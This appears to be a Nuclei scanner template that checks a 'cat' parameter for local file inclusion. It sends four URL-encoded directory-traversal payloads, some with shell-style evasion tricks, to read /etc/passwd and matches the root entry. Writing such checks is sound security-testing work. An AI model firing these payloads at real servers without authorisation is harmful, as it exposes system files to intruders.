id: param-lfi4

info:
  name: Local File Inclusion
  author: pelo
  severity: high
  description: |
     directory traversal via the GET /.. substring.

  tags: param-lfi4

requests:
  - method: GET
    path:
      - "{{BaseURL}}?cat=%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2Fetc/pa??wd{{"
      - "{{BaseURL}}?cat=%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2Fetc%2Fpasswd"
      - "{{BaseURL}}?cat=%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2Fet$()c/pa$()sswd?"
      - "{{BaseURL}}?cat=%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2Fet${neko}c/pas${pelo}swd"
    headers:
     User-Agent: "Mozila/5.0 (x11; Linux x86_x64) AppleWebkit/537.36 (KHTML, like gecko) chrome/87.0.4280.67 Safari"
     stop-at-first-match: true
    matchers:
      - type: regex
        part: body
        regex:
          - "root:[x*]:0:0"

